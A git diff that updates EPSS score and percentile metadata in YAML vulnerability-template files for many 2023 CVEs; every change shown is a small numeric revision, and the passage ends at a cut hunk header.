a/http/cves/2023/CVE-2023-39600.yaml b/http/cves/2023/CVE-2023-39600.yaml index cb1f827a4b8..c7125025f14 100644 --- a/http/cves/2023/CVE-2023-39600.yaml +++ b/http/cves/2023/CVE-2023-39600.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-39600 cwe-id: CWE-79 epss-score: 0.03219 - epss-percentile: 0.86672 + epss-percentile: 0.86674 cpe: cpe:2.3:a:icewarp:icewarp:11.4.6.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-39650.yaml b/http/cves/2023/CVE-2023-39650.yaml index 534ff322fd5..e59d58f8b39 100644 --- a/http/cves/2023/CVE-2023-39650.yaml +++ b/http/cves/2023/CVE-2023-39650.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-39650 cwe-id: CWE-89 epss-score: 0.28918 - epss-percentile: 0.96417 + epss-percentile: 0.9642 metadata: max-request: 4 verified: true diff --git a/http/cves/2023/CVE-2023-39676.yaml b/http/cves/2023/CVE-2023-39676.yaml index 08e1326b63a..80efaae9460 100644 --- a/http/cves/2023/CVE-2023-39676.yaml +++ b/http/cves/2023/CVE-2023-39676.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-39676 cwe-id: CWE-79 epss-score: 0.04608 - epss-percentile: 0.88925 + epss-percentile: 0.88923 cpe: cpe:2.3:a:fieldthemes:fieldpopupnewsletter:1.0.0:*:*:*:*:prestashop:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-39700.yaml b/http/cves/2023/CVE-2023-39700.yaml index ad070aa8639..86c9e57b18e 100644 --- a/http/cves/2023/CVE-2023-39700.yaml +++ b/http/cves/2023/CVE-2023-39700.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-39700 cwe-id: CWE-79 epss-score: 0.08095 - epss-percentile: 0.91895 + epss-percentile: 0.91891 cpe: cpe:2.3:a:icewarp:mail_server:10.4.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3990.yaml b/http/cves/2023/CVE-2023-3990.yaml index 987cbf4643c..4ef67485e76 100644 --- a/http/cves/2023/CVE-2023-3990.yaml +++ b/http/cves/2023/CVE-2023-3990.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-3990 cwe-id: CWE-79 epss-score: 0.1029 - epss-percentile: 0.92952 + epss-percentile: 0.92945 cpe: cpe:2.3:a:mingsoft:mcms:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-40208.yaml b/http/cves/2023/CVE-2023-40208.yaml index 91460bace4c..24f6b1f8bca 100644 --- a/http/cves/2023/CVE-2023-40208.yaml +++ b/http/cves/2023/CVE-2023-40208.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-40208 cwe-id: CWE-79 epss-score: 0.06005 - epss-percentile: 0.90408 + epss-percentile: 0.9041 cpe: cpe:2.3:a:urosevic:stock_ticker:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-40211.yaml b/http/cves/2023/CVE-2023-40211.yaml index 60d5a47830c..22e22fba12b 100644 --- a/http/cves/2023/CVE-2023-40211.yaml +++ b/http/cves/2023/CVE-2023-40211.yaml @@ -19,7 +19,7 @@ info: cvss-score: 7.5 cve-id: CVE-2023-40211 epss-score: 0.43263 - epss-percentile: 0.97391 + epss-percentile: 0.97387 cwe-id: CWE-200 cpe: cpe:2.3:a:pickplugins:post_grid_combo:*:*:*:*:*:wordpress:*:* metadata: diff --git a/http/cves/2023/CVE-2023-40355.yaml b/http/cves/2023/CVE-2023-40355.yaml index 870265f3c1e..5e6160ec8a5 100644 --- a/http/cves/2023/CVE-2023-40355.yaml +++ b/http/cves/2023/CVE-2023-40355.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-40355 cwe-id: CWE-79 epss-score: 0.15395 - epss-percentile: 0.94433 + epss-percentile: 0.94431 cpe: cpe:2.3:a:axigen:axigen_mobile_webmail:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-40748.yaml b/http/cves/2023/CVE-2023-40748.yaml index fc43405022b..fa4f3c53ca9 100644 --- a/http/cves/2023/CVE-2023-40748.yaml +++ b/http/cves/2023/CVE-2023-40748.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-40748 cwe-id: CWE-89 epss-score: 0.44459 - epss-percentile: 0.9745 + epss-percentile: 0.97446 cpe: cpe:2.3:a:phpjabbers:food_delivery_script:3.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-40749.yaml b/http/cves/2023/CVE-2023-40749.yaml index 73c1c407cb0..0b2612f0ccb 100644 --- a/http/cves/2023/CVE-2023-40749.yaml +++ b/http/cves/2023/CVE-2023-40749.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-40749 cwe-id: CWE-89 epss-score: 0.24809 - epss-percentile: 0.95971 + epss-percentile: 0.95975 cpe: cpe:2.3:a:phpjabbers:food_delivery_script:3.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-40750.yaml b/http/cves/2023/CVE-2023-40750.yaml index dc2aaf9ae95..3085965f978 100644 --- a/http/cves/2023/CVE-2023-40750.yaml +++ b/http/cves/2023/CVE-2023-40750.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-40750 cwe-id: CWE-79 epss-score: 0.01268 - epss-percentile: 0.79044 + epss-percentile: 0.79041 cpe: cpe:2.3:a:phpjabbers:yacht_listing_script:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-40751.yaml b/http/cves/2023/CVE-2023-40751.yaml index a8eafe354b7..8223c69c7e4 100644 --- a/http/cves/2023/CVE-2023-40751.yaml +++ b/http/cves/2023/CVE-2023-40751.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-40751 cwe-id: CWE-79 epss-score: 0.0114 - epss-percentile: 0.77974 + epss-percentile: 0.77969 cpe: cpe:2.3:a:phpjabbers:fundraising_script:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-40752.yaml b/http/cves/2023/CVE-2023-40752.yaml index bf85ef436bc..a0bda3f9d65 100644 --- a/http/cves/2023/CVE-2023-40752.yaml +++ b/http/cves/2023/CVE-2023-40752.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-40752 cwe-id: CWE-79 epss-score: 0.01268 - epss-percentile: 0.79044 + epss-percentile: 0.79041 cpe: cpe:2.3:a:phpjabbers:make_an_offer_widget:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-40753.yaml b/http/cves/2023/CVE-2023-40753.yaml index 474b1ed08c4..57459d7b2a1 100644 --- a/http/cves/2023/CVE-2023-40753.yaml +++ b/http/cves/2023/CVE-2023-40753.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-40753 cwe-id: CWE-79 epss-score: 0.00833 - epss-percentile: 0.74113 + epss-percentile: 0.74088 cpe: cpe:2.3:a:phpjabbers:ticket_support_script:3.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-40755.yaml b/http/cves/2023/CVE-2023-40755.yaml index 12af6d97e19..72dabbeeb44 100644 --- a/http/cves/2023/CVE-2023-40755.yaml +++ b/http/cves/2023/CVE-2023-40755.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-40755 cwe-id: CWE-79 epss-score: 0.01363 - epss-percentile: 0.7978 + epss-percentile: 0.7977 cpe: cpe:2.3:a:phpjabbers:callback_widget:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-40779.yaml b/http/cves/2023/CVE-2023-40779.yaml index f505ecd1738..fdd10ca1920 100644 --- a/http/cves/2023/CVE-2023-40779.yaml +++ b/http/cves/2023/CVE-2023-40779.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-40779 cwe-id: CWE-601 epss-score: 0.28157 - epss-percentile: 0.96342 + epss-percentile: 0.96345 cpe: cpe:2.3:a:icewarp:deep_castle_g2:13.0.1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4110.yaml b/http/cves/2023/CVE-2023-4110.yaml index 764aea97439..af5eea21b5d 100644 --- a/http/cves/2023/CVE-2023-4110.yaml +++ b/http/cves/2023/CVE-2023-4110.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-4110 cwe-id: CWE-79 epss-score: 0.07652 - epss-percentile: 0.91625 + epss-percentile: 0.91623 cpe: cpe:2.3:a:phpjabbers:availability_booking_calendar:5.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4115.yaml b/http/cves/2023/CVE-2023-4115.yaml index 011810feff6..feb1994adbc 100644 --- a/http/cves/2023/CVE-2023-4115.yaml +++ b/http/cves/2023/CVE-2023-4115.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-4115 cwe-id: CWE-79 epss-score: 0.20317 - epss-percentile: 0.95336 + epss-percentile: 0.95337 cpe: cpe:2.3:a:phpjabbers:cleaning_business_software:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4116.yaml b/http/cves/2023/CVE-2023-4116.yaml index 6d4b4705cd9..c97b80cd8d9 100644 --- a/http/cves/2023/CVE-2023-4116.yaml +++ b/http/cves/2023/CVE-2023-4116.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-4116 cwe-id: CWE-79 epss-score: 0.25347 - epss-percentile: 0.96033 + epss-percentile: 0.96036 cpe: cpe:2.3:a:phpjabbers:taxi_booking_script:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4136.yaml b/http/cves/2023/CVE-2023-4136.yaml index caaa5ffd7b9..2147740131b 100644 --- a/http/cves/2023/CVE-2023-4136.yaml +++ b/http/cves/2023/CVE-2023-4136.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-4136 cwe-id: CWE-79 epss-score: 0.18052 - epss-percentile: 0.94957 + epss-percentile: 0.94956 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N cvss-score: 6.1 metadata: diff --git a/http/cves/2023/CVE-2023-4148.yaml b/http/cves/2023/CVE-2023-4148.yaml index a9aa32e750f..1f6d692ead1 100644 --- a/http/cves/2023/CVE-2023-4148.yaml +++ b/http/cves/2023/CVE-2023-4148.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-4148 cwe-id: CWE-79 epss-score: 0.08051 - epss-percentile: 0.91871 + epss-percentile: 0.91868 cpe: cpe:2.3:a:metaphorcreations:ditty:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4151.yaml b/http/cves/2023/CVE-2023-4151.yaml index aae8ce0782a..84592f20f41 100644 --- a/http/cves/2023/CVE-2023-4151.yaml +++ b/http/cves/2023/CVE-2023-4151.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-4151 cwe-id: CWE-79 epss-score: 0.10845 - epss-percentile: 0.93149 + epss-percentile: 0.93144 cpe: cpe:2.3:a:agilelogix:store_locator:*:*:*:*:*:wordpress:*:* metadata: max-request: 3 diff --git a/http/cves/2023/CVE-2023-41538.yaml b/http/cves/2023/CVE-2023-41538.yaml index 180731158ba..68de9b16349 100644 --- a/http/cves/2023/CVE-2023-41538.yaml +++ b/http/cves/2023/CVE-2023-41538.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-41538 cwe-id: CWE-79 epss-score: 0.12939 - epss-percentile: 0.93842 + epss-percentile: 0.93838 cpe: cpe:2.3:a:phpjabbers:php_forum_script:3.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-41597.yaml b/http/cves/2023/CVE-2023-41597.yaml index 7ac0b42bc39..6353bb5ecba 100644 --- a/http/cves/2023/CVE-2023-41597.yaml +++ b/http/cves/2023/CVE-2023-41597.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-41597 cwe-id: CWE-79 epss-score: 0.11489 - epss-percentile: 0.93403 + epss-percentile: 0.93397 cpe: cpe:2.3:a:eyoucms:eyoucms:1.6.2:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-41621.yaml b/http/cves/2023/CVE-2023-41621.yaml index 8fa26d36e77..55844f57136 100644 --- a/http/cves/2023/CVE-2023-41621.yaml +++ b/http/cves/2023/CVE-2023-41621.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-41621 cwe-id: CWE-79 epss-score: 0.0529 - epss-percentile: 0.89707 + epss-percentile: 0.89704 cpe: cpe:2.3:a:emlog:emlog:2.1.14:*:*:*:pro:*:*:* metadata: vendor: emlog diff --git a/http/cves/2023/CVE-2023-4168.yaml b/http/cves/2023/CVE-2023-4168.yaml index 5924930c3b3..a3cc0ca230c 100644 --- a/http/cves/2023/CVE-2023-4168.yaml +++ b/http/cves/2023/CVE-2023-4168.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-4168 cwe-id: CWE-200,NVD-CWE-noinfo epss-score: 0.76556 - epss-percentile: 0.98897 + epss-percentile: 0.98896 cpe: cpe:2.3:a:templatecookie:adlisting:2.14.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4169.yaml b/http/cves/2023/CVE-2023-4169.yaml index 68f2ae53473..cd3a15576c9 100644 --- a/http/cves/2023/CVE-2023-4169.yaml +++ b/http/cves/2023/CVE-2023-4169.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-4169 cwe-id: CWE-284,NVD-CWE-noinfo epss-score: 0.90555 - epss-percentile: 0.99591 + epss-percentile: 0.99589 cpe: cpe:2.3:o:ruijie:rg-ew1200g_firmware:1.0\(1\)b1p5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-4173.yaml b/http/cves/2023/CVE-2023-4173.yaml index 4a71230864c..3838bbfbdeb 100644 --- a/http/cves/2023/CVE-2023-4173.yaml +++ b/http/cves/2023/CVE-2023-4173.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-4173 cwe-id: CWE-79 epss-score: 0.09336 - epss-percentile: 0.9252 + epss-percentile: 0.92514 cpe: cpe:2.3:a:moosocial:moostore:3.1.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-41763.yaml b/http/cves/2023/CVE-2023-41763.yaml index cfc164f514a..86dac9b4b2e 100644 --- a/http/cves/2023/CVE-2023-41763.yaml +++ b/http/cves/2023/CVE-2023-41763.yaml @@ -21,7 +21,7 @@ info: cvss-score: 5.3 cve-id: CVE-2023-41763 epss-score: 0.12665 - epss-percentile: 0.93763 + epss-percentile: 0.93757 cpe: cpe:2.3:a:microsoft:skype_for_business_server:2015:cumulative_update_13:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-41954.yaml b/http/cves/2023/CVE-2023-41954.yaml index f0aff76321d..4398ba16ba8 100644 --- a/http/cves/2023/CVE-2023-41954.yaml +++ b/http/cves/2023/CVE-2023-41954.yaml @@ -19,7 +19,7 @@ info: cvss-score: 8.6 cve-id: CVE-2023-41954 epss-score: 0.13029 - epss-percentile: 0.9387 + epss-percentile: 0.93867 cwe-id: CWE-269 cpe: cpe:2.3:a:properfraction:profilepress:*:*:*:*:*:wordpress:*:* metadata: diff --git a/http/cves/2023/CVE-2023-4284.yaml b/http/cves/2023/CVE-2023-4284.yaml index 56ae5ec1b81..1b29e497908 100644 --- a/http/cves/2023/CVE-2023-4284.yaml +++ b/http/cves/2023/CVE-2023-4284.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-4284 cwe-id: CWE-79 epss-score: 0.07924 - epss-percentile: 0.91783 + epss-percentile: 0.9178 cpe: cpe:2.3:a:agilelogix:post_timeline:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-43208.yaml b/http/cves/2023/CVE-2023-43208.yaml index 0b06cde6708..7eb3407b802 100644 --- a/http/cves/2023/CVE-2023-43208.yaml +++ b/http/cves/2023/CVE-2023-43208.yaml @@ -17,7 +17,7 @@ info: cvss-score: 9.8 cve-id: CVE-2023-43208 epss-score: 0.94416 - epss-percentile: 0.99977 + epss-percentile: 0.99976 cpe: cpe:2.3:a:nextgen:mirth_connect:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-43325.yaml b/http/cves/2023/CVE-2023-43325.yaml index 1a75ef63f23..21c0a4a83a7 100644 --- a/http/cves/2023/CVE-2023-43325.yaml +++ b/http/cves/2023/CVE-2023-43325.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-43325 cwe-id: CWE-79 epss-score: 0.09271 - epss-percentile: 0.92488 + epss-percentile: 0.92482 cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-43326.yaml b/http/cves/2023/CVE-2023-43326.yaml index f7b0acfe612..816b1ef1c87 100644 --- a/http/cves/2023/CVE-2023-43326.yaml +++ b/http/cves/2023/CVE-2023-43326.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-43326 cwe-id: CWE-79 epss-score: 0.23151 - epss-percentile: 0.95748 + epss-percentile: 0.95752 cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-43373.yaml b/http/cves/2023/CVE-2023-43373.yaml index 45fc4d0880b..7925c69dd53 100644 --- a/http/cves/2023/CVE-2023-43373.yaml +++ b/http/cves/2023/CVE-2023-43373.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-43373 cwe-id: CWE-89 epss-score: 0.17195 - epss-percentile: 0.94803 + epss-percentile: 0.94802 cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.5:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-43374.yaml b/http/cves/2023/CVE-2023-43374.yaml index c9cb5ec182c..9d00749e180 100644 --- a/http/cves/2023/CVE-2023-43374.yaml +++ b/http/cves/2023/CVE-2023-43374.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-43374 cwe-id: CWE-89 epss-score: 0.17195 - epss-percentile: 0.94803 + epss-percentile: 0.94802 cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.5:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-43472.yaml b/http/cves/2023/CVE-2023-43472.yaml index fe77e76fd12..1698fec9254 100644 --- a/http/cves/2023/CVE-2023-43472.yaml +++ b/http/cves/2023/CVE-2023-43472.yaml @@ -18,7 +18,7 @@ info: cvss-score: 7.5 cve-id: CVE-2023-43472 epss-score: 0.74435 - epss-percentile: 0.988 + epss-percentile: 0.98798 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-44012.yaml b/http/cves/2023/CVE-2023-44012.yaml index 465e02fe0e5..266d3e1b4d2 100644 --- a/http/cves/2023/CVE-2023-44012.yaml +++ b/http/cves/2023/CVE-2023-44012.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-44012 cwe-id: CWE-79 epss-score: 0.15202 - epss-percentile: 0.94394 + epss-percentile: 0.94391 cpe: cpe:2.3:a:mojoportal:mojoportal:2.7.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-4415.yaml b/http/cves/2023/CVE-2023-4415.yaml index 28db827a2a2..5bc290b6061 100644 --- a/http/cves/2023/CVE-2023-4415.yaml +++ b/http/cves/2023/CVE-2023-4415.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-4415 cwe-id: CWE-287 epss-score: 0.89966 - epss-percentile: 0.99558 + epss-percentile: 0.99557 cpe: cpe:2.3:o:ruijienetworks:rg-ew1200g_firmware:07161417_r483:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-44352.yaml b/http/cves/2023/CVE-2023-44352.yaml index 43bccb79b00..5e82bff3096 100644 --- a/http/cves/2023/CVE-2023-44352.yaml +++ b/http/cves/2023/CVE-2023-44352.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-44352 cwe-id: CWE-79 - epss-score: 0.8274 - epss-percentile: 0.99213 + epss-score: 0.82309 + epss-percentile: 0.99188 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-44353.yaml b/http/cves/2023/CVE-2023-44353.yaml index b5cb7c0e027..ff9f3f7b762 100644 --- a/http/cves/2023/CVE-2023-44353.yaml +++ b/http/cves/2023/CVE-2023-44353.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-44353 cwe-id: CWE-502 - epss-score: 0.90264 - epss-percentile: 0.99578 + epss-score: 0.90221 + epss-percentile: 0.99573 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-44393.yaml b/http/cves/2023/CVE-2023-44393.yaml index 416afbc1645..c2151afa96a 100644 --- a/http/cves/2023/CVE-2023-44393.yaml +++ b/http/cves/2023/CVE-2023-44393.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-44393 cwe-id: CWE-79 epss-score: 0.04696 - epss-percentile: 0.89035 + epss-percentile: 0.89032 cpe: cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:* metadata: vendor: piwigo diff --git a/http/cves/2023/CVE-2023-4451.yaml b/http/cves/2023/CVE-2023-4451.yaml index 67720a57f83..d617b556d08 100644 --- a/http/cves/2023/CVE-2023-4451.yaml +++ b/http/cves/2023/CVE-2023-4451.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-4451 cwe-id: CWE-79 epss-score: 0.60612 - epss-percentile: 0.98218 + epss-percentile: 0.98217 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-44812.yaml b/http/cves/2023/CVE-2023-44812.yaml index c35879d7321..fad1a1e943e 100644 --- a/http/cves/2023/CVE-2023-44812.yaml +++ b/http/cves/2023/CVE-2023-44812.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-44812 cwe-id: CWE-79 epss-score: 0.49696 - epss-percentile: 0.97715 + epss-percentile: 0.97709 cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-4490.yaml b/http/cves/2023/CVE-2023-4490.yaml index 21e5474097b..0d5d469bba2 100644 --- a/http/cves/2023/CVE-2023-4490.yaml +++ b/http/cves/2023/CVE-2023-4490.yaml @@ -17,7 +17,7 @@ info: cvss-score: 8.6 cwe-id: CWE-89 epss-score: 0.47698 - epss-percentile: 0.97611 + epss-percentile: 0.97606 cve-id: CVE-2023-4490 metadata: verified: true diff --git a/http/cves/2023/CVE-2023-45038.yaml b/http/cves/2023/CVE-2023-45038.yaml index 690522cdeec..e7c027abc01 100644 --- a/http/cves/2023/CVE-2023-45038.yaml +++ b/http/cves/2023/CVE-2023-45038.yaml @@ -19,7 +19,7 @@ info: cvss-score: 4.3 cve-id: CVE-2023-45038 epss-score: 0.04873 - epss-percentile: 0.89251 + epss-percentile: 0.89248 cwe-id: CWE-287 cpe: cpe:2.3:a:qnap:music_station:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2023/CVE-2023-4521.yaml b/http/cves/2023/CVE-2023-4521.yaml index 9552d1e821c..0335ee7b1e2 100644 --- a/http/cves/2023/CVE-2023-4521.yaml +++ b/http/cves/2023/CVE-2023-4521.yaml @@ -16,7 +16,7 @@ info: cvss-score: 9.8 cve-id: CVE-2023-4521 epss-score: 0.91709 - epss-percentile: 0.99665 + epss-percentile: 0.99664 cpe: cpe:2.3:a:mooveagency:import_xml_and_rss_feeds:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-4547.yaml b/http/cves/2023/CVE-2023-4547.yaml index 408eee6d74a..0e78a320aa7 100644 --- a/http/cves/2023/CVE-2023-4547.yaml +++ b/http/cves/2023/CVE-2023-4547.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-4547 cwe-id: CWE-79 epss-score: 0.16405 - epss-percentile: 0.94654 + epss-percentile: 0.94651 cpe: cpe:2.3:a:spa-cart:ecommerce_cms:1.9.0.3:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-45542.yaml b/http/cves/2023/CVE-2023-45542.yaml index a271bdf0600..0685c071f08 100644 --- a/http/cves/2023/CVE-2023-45542.yaml +++ b/http/cves/2023/CVE-2023-45542.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-45542 cwe-id: CWE-79 epss-score: 0.483 - epss-percentile: 0.97641 + epss-percentile: 0.97637 cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-45671.yaml b/http/cves/2023/CVE-2023-45671.yaml index a5b5f7086fd..ff6cb16ace7 100644 --- a/http/cves/2023/CVE-2023-45671.yaml +++ b/http/cves/2023/CVE-2023-45671.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-45671 cwe-id: CWE-79 epss-score: 0.26546 - epss-percentile: 0.96169 + epss-percentile: 0.96171 cpe: cpe:2.3:a:frigate:frigate:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-45826.yaml b/http/cves/2023/CVE-2023-45826.yaml index 7cd6e4e0aed..b1d5d2e7f26 100644 --- a/http/cves/2023/CVE-2023-45826.yaml +++ b/http/cves/2023/CVE-2023-45826.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-45826 cwe-id: CWE-89 epss-score: 0.1359 - epss-percentile: 0.94021 + epss-percentile: 0.94017 cpe: cpe:2.3:a:leantime:leantime:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-45852.yaml b/http/cves/2023/CVE-2023-45852.yaml index 3bfc36393d9..c32ceb6d362 100644 --- a/http/cves/2023/CVE-2023-45852.yaml +++ b/http/cves/2023/CVE-2023-45852.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2023-45852 cwe-id: CWE-77 epss-score: 0.93587 - epss-percentile: 0.99822 + epss-percentile: 0.99825 cpe: cpe:2.3:o:viessmann:vitogate_300_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-45855.yaml b/http/cves/2023/CVE-2023-45855.yaml index d8d5005b2fd..856fbba5d57 100644 --- a/http/cves/2023/CVE-2023-45855.yaml +++ b/http/cves/2023/CVE-2023-45855.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-45855 cwe-id: CWE-22 epss-score: 0.77635 - epss-percentile: 0.98945 + epss-percentile: 0.98944 cpe: cpe:2.3:a:qdpm:qdpm:9.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-4634.yaml b/http/cves/2023/CVE-2023-4634.yaml index 9369d1de7be..ff465815df3 100644 --- a/http/cves/2023/CVE-2023-4634.yaml +++ b/http/cves/2023/CVE-2023-4634.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-4634 cwe-id: CWE-73 epss-score: 0.92062 - epss-percentile: 0.99689 + epss-percentile: 0.99688 cpe: cpe:2.3:a:davidlingren:media_library_assistant:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-46347.yaml b/http/cves/2023/CVE-2023-46347.yaml index 03a8e84f027..4856acbff5c 100644 --- a/http/cves/2023/CVE-2023-46347.yaml +++ b/http/cves/2023/CVE-2023-46347.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-46347 cwe-id: CWE-89 epss-score: 0.75017 - epss-percentile: 0.98828 + epss-percentile: 0.98826 cpe: cpe:2.3:a:ndkdesign:ndk_steppingpack:*:*:*:*:*:prestashop:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-46359.yaml b/http/cves/2023/CVE-2023-46359.yaml index ccf50e4b4f1..1832a80e683 100644 --- a/http/cves/2023/CVE-2023-46359.yaml +++ b/http/cves/2023/CVE-2023-46359.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2023-46359 cwe-id: CWE-78 epss-score: 0.93063 - epss-percentile: 0.99775 + epss-percentile: 0.99774 cpe: cpe:2.3:h:hardy-barth:cph2_echarge:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-46455.yaml b/http/cves/2023/CVE-2023-46455.yaml index 97c1b78d8d8..1f4fb901ccc 100644 --- a/http/cves/2023/CVE-2023-46455.yaml +++ b/http/cves/2023/CVE-2023-46455.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-46455 cwe-id: CWE-22 epss-score: 0.48408 - epss-percentile: 0.97648 + epss-percentile: 0.97644 cpe: cpe:2.3:o:gl-inet:gl-ar300m_firmware:4.3.7:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-46732.yaml b/http/cves/2023/CVE-2023-46732.yaml index fa0dfeb0030..c3647932974 100644 --- a/http/cves/2023/CVE-2023-46732.yaml +++ 